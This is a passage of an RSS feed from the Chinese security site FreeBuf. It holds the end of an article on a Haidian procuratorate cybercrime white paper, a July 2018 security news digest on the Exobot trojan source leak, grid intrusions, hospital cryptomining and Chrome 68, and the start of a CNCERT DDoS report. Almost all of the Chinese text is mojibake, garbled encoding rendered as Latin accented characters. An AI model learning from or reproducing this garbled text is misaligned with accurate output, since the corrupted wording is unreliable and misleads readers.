1941<p style="text-align: justify;">éšç€â€œäº’è”网+â€ã€ä¿¡æ¯åŒ–建设的å‘展,具有公共æœåŠ¡èŒèƒ½çš„æ”¿åºœä¿¡æ¯ç³»ç»Ÿã€äº’è”网消费平å°ç‰å¼€å§‹è®¾ç½®å…·æœ‰ä¸€å®šå‚¨å€¼åŠŸèƒ½çš„å¹³å°,ç”±äºŽç³»ç»Ÿæœ¬èº«çš„æ¼æ´žæˆ–维护ä¸åŠæ—¶ç‰åŽŸå› ,给了犯罪分å以å¯ä¹˜ä¹‹æœºã€‚</p>
1942</p>
1943<h2><strong>五 ç½‘ç»œåŒ–çš„ä¼ ç»ŸçŠ¯ç½ª</strong></h2>
1944</p>
1945<p style="text-align: justify;">éšç€äº’è”网应用场景和互è”网技术的普åŠ,ä¼ ç»ŸçŠ¯ç½ªä¸Žç½‘ç»œå¹³å°ã€ç½‘络技术相结åˆ,开始出现了赌åšã€è´©æ¯’ã€è‰²æƒ…ç‰ä¼ 统犯罪å‘ç½‘ç»œç¤¾ä¼šçš„å»¶ä¼¸å’Œæ‰©å¼ çš„çŽ°è±¡ï¼Œè¡ç”Ÿå‡ºç½‘络赌åšã€ç½‘络色情ã€è´©å–毒å“ã€äº’è”网金èžè¯ˆéª—ç‰çŠ¯ç½ª,并出现从PC端å‘移动互è”端蔓延的趋势。</p>
1946</p>
1947<h3>1 ä¼ æ’æ·«ç§½ç‰©å“</h3>
1948</p>
1949<p style="text-align: justify;">微信群ç‰ç¤¾äº¤å·¥å…·çš„å‘展大大æé«˜äº†ä¿¡æ¯ä¼ æ’的效率,由于信æ¯é‡å·¨å¤§,监管难度高,导致淫秽信æ¯åœ¨ç½‘络空间泛滥。</p>
1950</p>
1951<h3>2 网络赌åšã€å¼€è®¾èµŒåœº</h3>
1952</p>
1953<p style="text-align: justify;">通过互è”网开设赌场,大大æé«˜äº†èµŒåšçš„ä¼ æ’æ•ˆçŽ‡ã€‚ç”±äºŽç½‘ç»œç©ºé—´éšè”½,æœåŠ¡å™¨é€šå¸¸æž¶è®¾åœ¨å¢ƒå¤–,网站线上åªè®¡ç®—点数,资金线通过线下代ç†å•†æµè½¬,å› æ¤åœ¨æ²¡æœ‰æå–åŽæ¥æ•°æ®çš„æƒ…况下很难统计出真实赌资。</p>
1954</p>
1955<h3>3 ç½‘ç»œè´©å–æ¯’å“</h3>
1956</p>
1957<p style="text-align: justify;">毒å“交易由于其é—åˆçš„特å¾ï¼Œå³ä½¿æ˜¯åœ¨çŽ°å®žç©ºé—´ä¹Ÿå¾ˆéš¾æ‰“å‡»ã€‚è€Œéšç€äº’è”网的使用,行为人通过网络è´ä¹°ã€è´©å–毒å“,ç”šè‡³æ˜¯èµ°ç§æ¯’å“,ä¹°å–åŒæ–¹é€šè¿‡äº’è”ç½‘å¹³å°æ›´åŠ æ–¹ä¾¿å¿«æ·åœ°è¿›è¡Œäº’è”,而ä¸éœ€è¦åŒæ–¹å‡ºé¢å°±èƒ½å®Œæˆäº¤æ˜“,使毒å“äº¤æ˜“æ›´åŠ éšè”½,åŠ å¤§äº†æ‰“å‡»çš„å›°éš¾ã€‚</p>
1958</p>
1959<h3>4 互è”ç½‘éžæ³•集资</h3>
1960</p>
1961<p style="text-align: justify;">éžæ³•集资类案件在“互è”网+â€çš„场景下出现了新的æ€åŠ¿å’Œç‰¹ç‚¹,互è”网的应用使得金èžäº§å“ç»è¥è€…ä¸Žå…¬ä¼—çš„é“¾æŽ¥æ›´åŠ ä¾¿æ·,金èžäº§å“进入的门槛也在é™ä½Ž,è¾ƒä¹‹ä¼ ç»Ÿçš„éžæ³•集资犯罪,å—å®³äººæŠ•èµ„çš„æ•°é¢æ›´å°‘。</p>
1962</p>
1963<h3>5 以第三方支付平å°ä¸ºå¯¹è±¡çš„盗窃ã€è¯ˆéª—</h3>
1964</p>
1965<p style="text-align: justify;">éšç€ç§»åŠ¨æ”¯ä»˜çš„æ™®åŠ,äººä»¬åœ¨æ”¯ä»˜åœºæ™¯ä¸‹é€‰æ‹©ä½¿ç”¨ç¬¬ä¸‰æ–¹å¹³å°æ”¯ä»˜æˆä¸ºå¸¸æ€ã€‚用户开通支付账户将自己的钱款å˜å…¥å…¶ä¸,ç»‘å®šå˜æ¬¾çš„银行å¡,æˆä¸ºçŠ¯ç½ªåˆ†å觊觎的对象。</p>
1966</p>
1967<p><strong>检察院如何应对</strong></p>
1968</p>
1969<p style="text-align: justify;">为积æžåº”å¯¹ç½‘ç»œçŠ¯ç½ªäº§ä¸šåŒ–ã€æ–°åž‹åŒ–ã€å¤æ‚åŒ–ç‰æŒ‘战,适应首都战略定ä½å¯¹æ£€å¯Ÿæœºå…³æœåŠ¡ä¿éšœç§‘æŠ€åˆ›æ–°çš„æ›´é«˜è¦æ±‚,北京市检察机关æŒç»åŠ å¼ºç½‘ç»œçŠ¯ç½ªåŠžæ¡ˆä¸“ä¸šåŒ–å»ºè®¾,利用专业优势,æ›´å¥½åœ°å‘æŒ¥å®¡å‰ç¨‹åºä¸çš„ä¸»å¯¼ä½œç”¨ã€æŒ‡æŽ§å’Œè¯æ˜ŽçŠ¯ç½ªçš„ä¸»ä½“ä½œç”¨,切实履行监ç£ã€å®¡æŸ¥ã€è¿½è¯‰æ³•定èŒè´£,æŽ¨åŠ¨ç½‘ç»œå®‰å…¨åˆ‘äº‹å¸æ³•ä¿æŠ¤è¿ˆä¸Šæ–°å°é˜¶ã€‚</p>
1970</p>
1971<p style="text-align: justify;">1)æŒç»åˆ›æ–°ä¸“业化办案机制,精准高效办ç†ç½‘络犯罪案件。 </p>
1972<blockquote><p>æ•´åˆä¸“业化办案资æº,办ç†é‡å¤§ç–‘éš¾å¤æ‚案件。</p>
1973<p>呿Œ¥æµ·æ·€åŒºé«˜æ ¡ã€ç§‘ç ”é™¢æ‰€èµ„æºé›†ä¸çš„优æå»ºæ£€å¦å…±å»ºå¹³å°,建立“外脑â€ä¸“家积æžå¼€å±•专家咨询,大大æå‡åŠžæ¡ˆè´¨æ•ˆã€‚</p>
1974<p>å¼€å±•ä¸“ä¸šåŒæ¥è¾…助审查,è§£å†³ç”µåæ•°æ®å®¡æŸ¥éš¾é¢˜ã€‚</p>
1975</blockquote>
1976<p style="text-align: justify;">2)积æžå‘挥æå‰ä»‹å…¥ä¼˜åŠ¿ï¼Œå¼•å¯¼ä¾¦æŸ¥å–è¯æœ‰åŠ›ã€‚</p>
1977</p>
1978<p style="text-align: justify;">3)积æžå‚与社会治ç†åˆ›æ–°åˆ‡å®žæŽ¨åŠ¨ç½‘ç»œå®‰å…¨ä¿æŠ¤ã€‚</p>
1979</p>
1980<blockquote><p>å†…å®¹æ¥æºäºŽåŒ—äº¬å¸‚æµ·æ·€åŒºäººæ°‘æ£€å¯Ÿé™¢ã€Šç½‘ç»œå®‰å…¨åˆ‘äº‹å¸æ³•ä¿æŠ¤ç™½çš®ä¹¦ã€‹ï¼Œå…¨æ–‡å®Œæ•´ç‰ˆä¸‹è½½é“¾æŽ¥ï¼š</p>
1981<p><a href="https://pan.baidu.com/s/1LY2VniFD5UZNiYCF8hQdtw">https://pan.baidu.com/s/1LY2VniFD5UZNiYCF8hQdtw</a></p>
1982</blockquote>
1983<p><b style="color: rgb(159, 163, 168);">*本文作者:boshit,转载请注明æ¥è‡ªFreeBuf.COM</b></p>
1984]]></content:encoded>
1985 <wfw:commentRss>http://www.freebuf.com/articles/network/178114.html/feed</wfw:commentRss>
1986 <slash:comments>0</slash:comments>
1987 </item>
1988 <item>
1989 <title>BUFæ—©é¤é“º | Chrome 68æ£å¼å‘所有ä¸å®‰å…¨çš„HTTP网站开炮;安å“银行木马 Exobot çš„æºä»£ç éæ³„露;Windows 7/8.1æ›´æ–°è°ƒæ•´è¢«åæ§½ï¼›</title>
1990 <link>http://www.freebuf.com/news/178566.html</link>
1991 <comments>http://www.freebuf.com/news/178566.html#comments</comments>
1992 <pubDate>Tue, 24 Jul 2018 23:00:17 +0000</pubDate>
1993 <dc:creator>shidongqi</dc:creator>
1994 <category><![CDATA[资讯]]></category>
1995 <category><![CDATA[BUFæ—©é¤é“º]]></category>
1996 <category><![CDATA[chrome]]></category>
1997 <category><![CDATA[安å“]]></category>
1998
1999 <guid isPermaLink="false">http://www.freebuf.com/?p=178566</guid>
2000 <description><![CDATA[å„ä½Buffer早上好,今天是2018å¹´7月25æ—¥æ˜ŸæœŸä¸‰ï¼Œå†œåŽ†å…æœˆå三。今天份的BUFæ—©é¤å†…å®¹ä¸»è¦æœ‰ï¼š Chrome 68æ£å¼å‘所有ä¸å®‰å…¨çš„HTTP网站开炮;安å“银行木马 Exobot çš„æºä»£ç éæ³„露;Windows 7/8.1æ›´æ–°è°ƒæ•´è¢«åæ§½ï¼›ä¿„ç½—æ–¯é»‘å®¢å…¥ä¾µç¾Žç”µåŠ›å…¬å¸æŽ§åˆ¶å®¤ï¼›å¤šå®¶ä¸‰ç”²åŒ»é™¢æœåС噍é黑客入侵,通过木马挖矿。 安全资讯早知é“,两分钟å¬å®Œæœ€æ–°å®‰å…¨å¿«è®¯~ Windows 7/8.1æ›´æ–°è°ƒæ•´è¢«åæ§½ å¾®è½¯çš„æ•°æ®æ”¶é›†æ–¹å¼åކæ¥å¤‡å—争议,近日开始é¢å‘所有Windows 7/8.1设备分别推é€äº†KB2952664å’ŒKB2976978更新。ä¸è¿‡å’Œä»¥å¾€æ›´æ–°éƒ¨ç½²æœ‰æ‰€ä¸åŒï¼Œæ¤å‰è¯¥ä¸¤ä¸ªæ›´æ–°å‡ä¸ºå¯é€‰æ›´æ–°ï¼Œç”¨æˆ·éœ€è¦æ‰‹åЍæ“作æ‰èƒ½éƒ¨ç½²ã€‚è€ŒçŽ°åœ¨å¾®è½¯å°†è¿™ä¸¤ä¸ªæ›´æ–°æ ‡è®°ä¸ºâ€œå…³é”®â€ï¼Œæ„å‘³ç€æ‰€æœ‰è®¾å¤‡éƒ½ä¼šé€šè¿‡Windows Updateè¿›è¡Œéƒ¨ç½²ï¼Œè€Œè¿™æ— ç–‘åŠ å‰§äº†å¯¹å¾®è½¯é¥æµ‹æœåŠ¡çš„åæ§½ã€‚[æ¥æºï¼šcnBeta] Chrome 68æ£å¼å‘所有ä¸å®‰å…¨çš„HTTP网站开炮 在 7 月 24 å·å‘布的 Chrome 68 ä¸ï¼ŒGoogle 引入了一项é‡å¤§çš„å˜åŒ–ã€‚å½“åŠ è½½éž HTTPS 网站时,该æµè§ˆå™¨çš„å¤„ç†æ–¹å¼ä¼šæ›´åŠ å®¡æ…Žã€‚æ®æ‚‰ï¼Œåªè¦é‡åˆ°æ½œåœ¨ä¸å®‰å…¨çš„站点,Chrome 都将开始抛出è¦å‘Šä¿¡æ¯ã€‚虽然ä¸ä¼šå¯¹æ—¥å¸¸ä½¿ç”¨é€ æˆå¤ªå¤§çš„å½±å“,但这确实是迄今为æ¢å‘生的一个é‡å¤§è½¬å˜ã€‚在之å‰ç‰ˆæœ¬çš„ Chrome æµè§ˆå™¨ä¸ï¼ŒGoogle è¿˜åªæ˜¯å¼ºè°ƒâ€œå½“å‰è®¿é—®çš„网站是å¦é‡‡è®¿ç”¨äº†æ›´åŠ å®‰å…¨çš„ HTTPS åŠ å¯†â€ï¼Œå¹¶åœ¨åœ°å€æ ä¸Šå‡¸æ˜¾ä¸€ä¸ªæ ‡è®°ã€‚[æ¥æºï¼šcnBeta] 安å“银行木马 Exobot çš„æºä»£ç éæ³„露 Exobot æ˜¯ä¸€æ¬¾å¼ºå¤§çš„å®‰å“æœ¨é©¬ï¼Œé¦–次于2016年末出现在大众视野,而在今年1月份被出售é到作者神秘抛弃。ThreatFabric å…¬å¸çš„ç ”ç©¶å‘˜è¡¨ç¤ºï¼ŒExobot 木马的æºä»£ç 实际上在5月份就已被泄露到网上:当时一å买家决定在圈å内分享该æºä»£ç 。自æ¤ï¼Œç¬”者å‘现 Exobot çš„æºä»£ç 现在æ£åœ¨å¤šä¸ªåœ°ä¸‹é»‘客论å›ä¸Šä¼ æ’ã€‚å®‰å…¨ç ”ç©¶å‘˜çŽ°åœ¨æ‹…å¿ƒæºä»£ç éæ³„露å¯èƒ½å¯¼è‡´è¶Šæ¥è¶Šå¤šçš„安å“应用会é该木马感染。[æ¥æºï¼šCodeSafe] ä¿„ç½—æ–¯é»‘å®¢å…¥ä¾µç¾Žç”µåŠ›å…¬å¸æŽ§åˆ¶å®¤ 美国国土安全部官员称,俄罗斯黑客入侵了电力公å¸è¢«è®¤ä¸ºå®‰å…¨çš„隔离网络。黑客甚至找到方法能打开开关和干扰电力输é€ã€‚针对美国电力公å¸çš„黑客攻击始于去年底,很有å¯èƒ½ä»åœ¨ç»§ç»ã€‚美国国土安全部从 2014 å¹´èµ·å°±è¦å‘Šç”µåЛ公å¸é«˜ç®¡æ³¨æ„俄罗斯黑客组织对基础设施的å¨èƒï¼Œæœ¬å‘¨å®ƒé¦–次披露了攻击细节,称å—害者多达数百个,部分公å¸å¯èƒ½ä»ç„¶ä¸çŸ¥é“他们已ç»éåˆ°äº†å…¥ä¾µï¼Œå› ä¸ºæ”»å‡»è€…åˆ©ç”¨äº†å…¬å¸é›‡å‘˜çš„å‡è¯æ¸—é€åˆ°å†…网,让入侵难以å‘现。 攻击者首先是利用钓鱼攻击窃å–登录å‡è¯å…¥ä¾µä¾›åº”商的内部网络。一旦渗é€åˆ°ä¾›åº”商的网络,他们开始转å‘真æ£çš„ç›®æ ‡â€”â€”ç”µåŠ›å…¬å¸ã€‚这个过程相对比较简å•,很多情况下窃å–了供应商的å‡è¯ä¹‹åŽä»–们就能直接访问电力公å¸çš„网络,然åŽå¼€å§‹çªƒå–机密信æ¯ï¼Œå¦‚电力公å¸ç½‘络的é…置信æ¯ï¼Œåªæœ‰åœ¨ç†Ÿæ‚‰å…¶ç½‘络之åŽä»–们æ‰èƒ½è¿›ä¸€æ¥çš„干扰其è¿ä½œã€‚攻击者还将自己伪装æˆèƒ½ç»å¸¸æŽ¥è§¦è¿™äº›ç³»ç»Ÿçš„人。[æ¥æºï¼šSolidot] 多家三甲医院æœåС噍é黑客入侵,通过木马挖矿 æ®è…¾è®¯å¾¡è§å¨èƒæƒ…报ä¸å¿ƒæ¶ˆæ¯ï¼Œè¿‘期该机构检测到广东ã€é‡åº†å¤šå®¶ä¸‰ç”²åŒ»é™¢æœåŠ¡å™¨è¢«é»‘å®¢å…¥ä¾µï¼Œæ”»å‡»è€…æš´åŠ›ç ´è§£åŒ»é™¢æœåŠ¡å™¨çš„è¿œç¨‹ç™»å½•æœåŠ¡ï¼Œä¹‹åŽåˆ©ç”¨æœ‰é“ç¬”è®°çš„åˆ†äº«æ–‡ä»¶åŠŸèƒ½ä¸‹è½½å¤šç§æŒ–矿木马。 è¯¥æœºæž„è¡¨ç¤ºï¼Œæ”»å‡»è€…ä½¿ç”¨çš„æŒ–çŸ¿æœ¨é©¬æ‹¥æœ‰å¤šä¸ªçŸ¿æ± ï¼Œå¼€æŒ–çš„å±±å¯¨åŠ å¯†å¸åŒ…括:门罗å¸ã€ä»¥å¤ªåŠã€é›¶å¸ç‰ç‰ï¼Œä»ŽçŸ¿æ± ä¿¡æ¯çœ‹ï¼Œç›®å‰æ”»å‡»è€…已累积获利达40余万元人民å¸ã€‚我国医疗机构开放远程登录æœåŠ¡ï¼ˆç«¯å£å·ï¼š22)的比例高达50%,这æ„å‘³ç€æœ‰ä¸€åŠçš„æœåŠ¡å™¨å¯èƒ½éé‡ç›¸åŒçš„æ”»å‡»ã€‚[æ¥æºï¼šBianews] *本文由Andy.iæ•´ç†ç¼–译,转载请注明æ¥è‡ªFreeBuf.COM]]></description>
2001 <content:encoded><![CDATA[<p><b style="color: rgb(0, 176, 80);">å„ä½Buffer早上好,今天是2018å¹´7月25æ—¥æ˜ŸæœŸä¸‰ï¼Œå†œåŽ†å…æœˆå三。今天份的BUFæ—©é¤å†…å®¹ä¸»è¦æœ‰ï¼š Chrome 68æ£å¼å‘所有ä¸å®‰å…¨çš„HTTP网站开炮;安å“银行木马 Exobot çš„æºä»£ç éæ³„露;Windows 7/8.1æ›´æ–°è°ƒæ•´è¢«åæ§½ï¼›ä¿„ç½—æ–¯é»‘å®¢å…¥ä¾µç¾Žç”µåŠ›å…¬å¸æŽ§åˆ¶å®¤ï¼›å¤šå®¶ä¸‰ç”²åŒ»é™¢æœåС噍é黑客入侵,通过木马挖矿。</b></p>
2002<p style="text-align: center;"><b style="color: rgb(0, 176, 80);"><span style="font-size: 15px; color: rgb(239, 71, 71);">安全资讯早知é“,两分钟å¬å®Œæœ€æ–°å®‰å…¨å¿«è®¯~</span><br /></b></p>
2003<p style="text-align: center;"> <embed src="//music.163.com/outchain/player?type=3&id=1370291949&auto=0&height=66" width="330" height="110"></p>
2004<h3><img alt="meal-2069021_960_720.jpg" src="http://image.3001.net/images/20180724/15324152169228.jpg!small" width="690" height="459">Windows 7/8.1æ›´æ–°è°ƒæ•´è¢«åæ§½<br /></h3>
2005<p>å¾®è½¯çš„æ•°æ®æ”¶é›†æ–¹å¼åކæ¥å¤‡å—争议,近日开始é¢å‘所有Windows 7/8.1设备分别推é€äº†KB2952664å’ŒKB2976978更新。ä¸è¿‡å’Œä»¥å¾€æ›´æ–°éƒ¨ç½²æœ‰æ‰€ä¸åŒï¼Œæ¤å‰è¯¥ä¸¤ä¸ªæ›´æ–°å‡ä¸ºå¯é€‰æ›´æ–°ï¼Œç”¨æˆ·éœ€è¦æ‰‹åЍæ“作æ‰èƒ½éƒ¨ç½²ã€‚è€ŒçŽ°åœ¨å¾®è½¯å°†è¿™ä¸¤ä¸ªæ›´æ–°æ ‡è®°ä¸ºâ€œå…³é”®â€ï¼Œæ„å‘³ç€æ‰€æœ‰è®¾å¤‡éƒ½ä¼šé€šè¿‡Windows Updateè¿›è¡Œéƒ¨ç½²ï¼Œè€Œè¿™æ— ç–‘åŠ å‰§äº†å¯¹å¾®è½¯é¥æµ‹æœåŠ¡çš„åæ§½ã€‚[æ¥æºï¼š<a href="https://www.cnbeta.com/articles/tech/749763.htm" target="_blank" ref="">cnBeta</a>] </p>
2006<h3>Chrome 68æ£å¼å‘所有ä¸å®‰å…¨çš„HTTP网站开炮<br /></h3>
2007<p>在 7 月 24 å·å‘布的 Chrome 68 ä¸ï¼ŒGoogle 引入了一项é‡å¤§çš„å˜åŒ–ã€‚å½“åŠ è½½éž HTTPS 网站时,该æµè§ˆå™¨çš„å¤„ç†æ–¹å¼ä¼šæ›´åŠ å®¡æ…Žã€‚æ®æ‚‰ï¼Œåªè¦é‡åˆ°æ½œåœ¨ä¸å®‰å…¨çš„站点,Chrome 都将开始抛出è¦å‘Šä¿¡æ¯ã€‚虽然ä¸ä¼šå¯¹æ—¥å¸¸ä½¿ç”¨é€ æˆå¤ªå¤§çš„å½±å“,但这确实是迄今为æ¢å‘生的一个é‡å¤§è½¬å˜ã€‚在之å‰ç‰ˆæœ¬çš„ Chrome æµè§ˆå™¨ä¸ï¼ŒGoogle è¿˜åªæ˜¯å¼ºè°ƒâ€œå½“å‰è®¿é—®çš„网站是å¦é‡‡è®¿ç”¨äº†æ›´åŠ å®‰å…¨çš„ HTTPS åŠ å¯†â€ï¼Œå¹¶åœ¨åœ°å€æ ä¸Šå‡¸æ˜¾ä¸€ä¸ªæ ‡è®°ã€‚[æ¥æºï¼š<a href="https://www.cnbeta.com/articles/tech/749991.htm" target="_blank" ref="">cnBeta</a>] </p>
2008<h3>安å“银行木马 Exobot çš„æºä»£ç éæ³„露<br /></h3>
2009<p>Exobot æ˜¯ä¸€æ¬¾å¼ºå¤§çš„å®‰å“æœ¨é©¬ï¼Œé¦–次于2016年末出现在大众视野,而在今年1月份被出售é到作者神秘抛弃。ThreatFabric å…¬å¸çš„ç ”ç©¶å‘˜è¡¨ç¤ºï¼ŒExobot 木马的æºä»£ç 实际上在5月份就已被泄露到网上:当时一å买家决定在圈å内分享该æºä»£ç 。自æ¤ï¼Œç¬”者å‘现 Exobot çš„æºä»£ç 现在æ£åœ¨å¤šä¸ªåœ°ä¸‹é»‘客论å›ä¸Šä¼ æ’ã€‚å®‰å…¨ç ”ç©¶å‘˜çŽ°åœ¨æ‹…å¿ƒæºä»£ç éæ³„露å¯èƒ½å¯¼è‡´è¶Šæ¥è¶Šå¤šçš„安å“应用会é该木马感染。[æ¥æºï¼š<a href="http://codesafe.cn/index.php?r=news/detail&id=4328" target="_blank" ref="">CodeSafe</a>]</p>
2010<h3>ä¿„ç½—æ–¯é»‘å®¢å…¥ä¾µç¾Žç”µåŠ›å…¬å¸æŽ§åˆ¶å®¤<br /></h3>
2011<p>美国国土安全部官员称,俄罗斯黑客入侵了电力公å¸è¢«è®¤ä¸ºå®‰å…¨çš„隔离网络。黑客甚至找到方法能打开开关和干扰电力输é€ã€‚针对美国电力公å¸çš„黑客攻击始于去年底,很有å¯èƒ½ä»åœ¨ç»§ç»ã€‚美国国土安全部从 2014 å¹´èµ·å°±è¦å‘Šç”µåЛ公å¸é«˜ç®¡æ³¨æ„俄罗斯黑客组织对基础设施的å¨èƒï¼Œæœ¬å‘¨å®ƒé¦–次披露了攻击细节,称å—害者多达数百个,部分公å¸å¯èƒ½ä»ç„¶ä¸çŸ¥é“他们已ç»éåˆ°äº†å…¥ä¾µï¼Œå› ä¸ºæ”»å‡»è€…åˆ©ç”¨äº†å…¬å¸é›‡å‘˜çš„å‡è¯æ¸—é€åˆ°å†…网,让入侵难以å‘现。</p>
2012<p>攻击者首先是利用钓鱼攻击窃å–登录å‡è¯å…¥ä¾µä¾›åº”商的内部网络。一旦渗é€åˆ°ä¾›åº”商的网络,他们开始转å‘真æ£çš„ç›®æ ‡â€”â€”ç”µåŠ›å…¬å¸ã€‚这个过程相对比较简å•,很多情况下窃å–了供应商的å‡è¯ä¹‹åŽä»–们就能直接访问电力公å¸çš„网络,然åŽå¼€å§‹çªƒå–机密信æ¯ï¼Œå¦‚电力公å¸ç½‘络的é…置信æ¯ï¼Œåªæœ‰åœ¨ç†Ÿæ‚‰å…¶ç½‘络之åŽä»–们æ‰èƒ½è¿›ä¸€æ¥çš„干扰其è¿ä½œã€‚攻击者还将自己伪装æˆèƒ½ç»å¸¸æŽ¥è§¦è¿™äº›ç³»ç»Ÿçš„人。[æ¥æºï¼š<a href="https://www.solidot.org/story?sid=57306" target="_blank" ref="">Solidot</a>]</p>
2013<h3>多家三甲医院æœåС噍é黑客入侵,通过木马挖矿<br /></h3>
2014<p>æ®è…¾è®¯å¾¡è§å¨èƒæƒ…报ä¸å¿ƒæ¶ˆæ¯ï¼Œè¿‘期该机构检测到广东ã€é‡åº†å¤šå®¶ä¸‰ç”²åŒ»é™¢æœåŠ¡å™¨è¢«é»‘å®¢å…¥ä¾µï¼Œæ”»å‡»è€…æš´åŠ›ç ´è§£åŒ»é™¢æœåŠ¡å™¨çš„è¿œç¨‹ç™»å½•æœåŠ¡ï¼Œä¹‹åŽåˆ©ç”¨æœ‰é“ç¬”è®°çš„åˆ†äº«æ–‡ä»¶åŠŸèƒ½ä¸‹è½½å¤šç§æŒ–矿木马。</p>
2015<p>è¯¥æœºæž„è¡¨ç¤ºï¼Œæ”»å‡»è€…ä½¿ç”¨çš„æŒ–çŸ¿æœ¨é©¬æ‹¥æœ‰å¤šä¸ªçŸ¿æ± ï¼Œå¼€æŒ–çš„å±±å¯¨åŠ å¯†å¸åŒ…括:门罗å¸ã€ä»¥å¤ªåŠã€é›¶å¸ç‰ç‰ï¼Œä»ŽçŸ¿æ± ä¿¡æ¯çœ‹ï¼Œç›®å‰æ”»å‡»è€…已累积获利达40余万元人民å¸ã€‚我国医疗机构开放远程登录æœåŠ¡ï¼ˆç«¯å£å·ï¼š22)的比例高达50%,这æ„å‘³ç€æœ‰ä¸€åŠçš„æœåŠ¡å™¨å¯èƒ½éé‡ç›¸åŒçš„æ”»å‡»ã€‚[æ¥æºï¼š<a href="https://www.bianews.com/news/flash?id=16964" target="_blank" ref="">Bianews</a>]</p>
2016<p><b style="color: rgb(159, 163, 168);">*本文由Andy.iæ•´ç†ç¼–译,转载请注明æ¥è‡ªFreeBuf.COM</b></p>
2017]]></content:encoded>
2018 <wfw:commentRss>http://www.freebuf.com/news/178566.html/feed</wfw:commentRss>
2019 <slash:comments>4</slash:comments>
2020 </item>
2021 <item>
2022 <title>CNCERT:我国DDoSæ”»å‡»èµ„æºæœˆåº¦åŠ2018年上åŠå¹´æ²»ç†æƒ…å†µåˆ†æžæŠ¥å‘Š</title>
2023 <link>http://www.freebuf.com/articles/paper/178568.html</link>
2024 <comments>http://www.freebuf.com/articles/paper/178568.html#comments</comments>
2025 <pubDate>Tue, 24 Jul 2018 11:02:34 +0000</pubDate>
2026 <dc:creator>CNCERT</dc:creator>
2027 <category><![CDATA[安全报告]]></category>
2028 <category><![CDATA[CNCERT]]></category>
2029 <category><![CDATA[ddos]]></category>
2030
2031 <guid isPermaLink="false">http://www.freebuf.com/?p=178568</guid>
2032 <description><![CDATA[本月é‡ç‚¹å…³æ³¨æƒ…况 1ã€æœ¬æœˆåˆ©ç”¨è‚‰é¸¡å‘èµ·DDoS攻击的控制端ä¸ï¼Œå¢ƒå¤–控制端近一åŠä½äºŽç¾Žå›½ï¼›å¢ƒå†…控制端最多ä½äºŽåŒ—京市,其次是浙江çœã€æ²³å—çœå’Œè´µå·žçœï¼ŒæŒ‰å½’属è¿è¥å•†ç»Ÿè®¡ï¼Œç”µä¿¡å 的比例最大。 2ã€æœ¬æœˆå‚与攻击较多的肉鸡地å€ä¸»è¦ä½äºŽåŒ—京市ã€è´µå·žçœã€å››å·çœå’Œäº‘å—çœï¼Œå…¶ä¸å¤§é‡è‚‰é¸¡åœ°å€å½’属于电信è¿è¥å•†ã€‚2018年以æ¥ç›‘测到的æŒç»æ´»è·ƒçš„肉鸡资æºä¸ï¼Œä½äºŽå±±ä¸œçœã€ä¸Šæµ·å¸‚ã€å¹¿ä¸œçœå 的比例最大。 3ã€æœ¬æœˆè¢«åˆ©ç”¨å‘èµ·Memcachedå射攻击境内åå°„æœåŠ¡å™¨æ•°é‡æŒ‰çœä»½ç»Ÿè®¡æŽ’åå‰ä¸‰åçš„çœä»½æ˜¯å±±ä¸œçœã€å¹¿ä¸œçœå’ŒåŒ—äº¬å¸‚ï¼Œæ•°é‡æœ€å¤šçš„归属è¿è¥å•†æ˜¯ç”µä¿¡ã€‚被利用å‘èµ·NTPå射攻击的境内åå°„æœåŠ¡å™¨æ•°é‡æŒ‰çœä»½ç»Ÿè®¡æŽ’åå‰ä¸‰åçš„çœä»½æ˜¯å¹¿ä¸œçœã€å±±ä¸œçœå’Œç”˜è‚ƒçœï¼›æ•°é‡æœ€å¤šçš„归属è¿è¥å•†æ˜¯ç§»åŠ¨ã€‚è¢«åˆ©ç”¨å‘èµ·SSDPå射攻击的境内åå°„æœåŠ¡å™¨æ•°é‡æŒ‰çœä»½ç»Ÿè®¡æŽ’åå‰ä¸‰åçš„çœä»½æ˜¯è¾½å®çœã€æ±Ÿè‹çœå’Œæ²³å—çœï¼›æ•°é‡æœ€å¤šçš„归属è¿è¥å•†æ˜¯è”通。 4ã€æœ¬æœˆè½¬å‘ä¼ªé€ è·¨åŸŸæ”»å‡»æµé‡çš„路由器ä¸ï¼Œå½’属于新疆维å¾å°”自治区移动的æŸè·¯ç”±å™¨å‚ä¸Žçš„æ”»å‡»äº‹ä»¶æ•°é‡æœ€å¤šï¼›åŒ—äº¬å¸‚ã€æ±Ÿè‹çœå’Œå±±ä¸œçœçš„è·¨åŸŸä¼ªé€ æ¥æºè·¯ç”±å™¨æ•°é‡æœ€å¤šã€‚ 5ã€æœ¬æœˆè½¬å‘ä¼ªé€ æœ¬åœ°æ”»å‡»æµé‡çš„路由器ä¸ï¼Œå½’属于山西çœç”µä¿¡çš„æŸè·¯ç”±å™¨å‚ä¸Žçš„æ”»å‡»äº‹ä»¶æ•°é‡æœ€å¤šï¼›æ±Ÿè‹çœã€å±±è¥¿çœã€é™•西çœå’Œå¹¿ä¸œçœçš„æœ¬åœ°ä¼ªé€ æµé‡æ¥æºè·¯ç”±å™¨æ•°é‡æœ€å¤šã€‚ 6ã€ç»è¿‡åŠå¹´æ¥é’ˆå¯¹æˆ‘国境内的攻击资æºçš„专项治ç†å·¥ä½œï¼Œå¢ƒå†…控制端ã€è‚‰é¸¡ç‰èµ„æºçš„æœˆæ´»è·ƒæ•°é‡è¾ƒ2017年有了较明显的下é™è¶‹åŠ¿ï¼›å¢ƒå†…æŽ§åˆ¶ç«¯ã€è·¨åŸŸä¼ªé€ æµé‡æ¥æºè·¯ç”±å™¨ã€æœ¬åœ°ä¼ªé€ æµé‡æ¥æºè·¯ç”±å™¨ç‰èµ„æºè¿‘ä¸‰ä¸ªæœˆæ¯æœˆçš„æ–°å¢žçŽ‡ã€æ¶ˆäº¡çŽ‡ç›¸æ¯”2017å¹´æœˆåº¦å¹³å‡æ•°å€¼æœ‰ä¸€å®šç¨‹åº¦çš„上å‡ï¼Œæ„味ç€èµ„æºå˜åŒ–é€Ÿåº¦åŠ å¿«ï¼Œå¯è¢«åˆ©ç”¨çš„资æºç¨³å®šæ€§é™ä½Žï¼›å¢ƒå†…åå°„æœåŠ¡å™¨èµ„æºæ¯æœˆçš„æ–°å¢žçŽ‡ã€æ¶ˆäº¡çŽ‡ç›¸æ¯”2017å¹´æœˆåº¦å¹³å‡æ•°å€¼ï¼Œæ–°å¢žçއå˜åŒ–䏿˜Žæ˜¾ã€æ¶ˆäº¡çŽ‡å‘ˆçŽ°ä¸€å®šç¨‹åº¦çš„ä¸‹é™ï¼Œæ„味ç€å¯åˆ©ç”¨çš„èµ„æºæ•°é‡é€æ¥å‡å°‘。 